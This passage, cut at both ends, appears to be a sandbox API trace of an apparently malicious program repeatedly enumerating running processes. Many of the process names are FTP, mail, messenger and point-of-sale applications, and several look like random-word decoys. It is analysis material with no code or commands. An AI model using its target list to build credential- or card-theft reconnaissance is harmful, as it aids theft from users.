lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.804] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0181.806] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0181.807] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0181.809] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0181.811] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0181.813] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0181.814] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0181.816] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0181.818] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0181.820] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0181.822] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0181.824] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0181.825] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0181.827] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0181.828] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0181.830] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0181.839] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0181.841] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0181.843] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0181.845] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0181.847] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0181.848] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0181.851] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0181.854] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0181.856] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0181.858] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0181.860] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0181.863] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0181.865] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0181.867] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0181.869] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0181.871] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0181.899] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0181.903] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0181.906] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0181.910] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0181.913] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0181.916] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0181.918] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0181.920] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0181.923] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0181.940] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0181.944] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0181.947] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0181.956] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0181.958] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0181.960] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0181.962] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0181.965] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0181.967] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0181.969] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0181.972] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0181.975] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0181.977] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0181.979] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0181.981] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0181.983] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0181.985] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0181.986] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0181.988] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0181.991] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0181.996] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0181.998] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0182.000] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0182.002] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0182.004] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0182.006] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0182.008] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0182.010] Process32Next (in: hSnapshot=0xb60, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0182.012] CloseHandle (hObject=0xb60) returned 1 [0182.012] Sleep (dwMilliseconds=0x64) [0182.163] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1974 [0182.176] Process32First (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.178] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0182.181] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0182.183] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.185] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0182.187] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.189] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0182.191] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0182.193] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0182.194] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.196] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.198] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0182.240] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.243] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.246] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 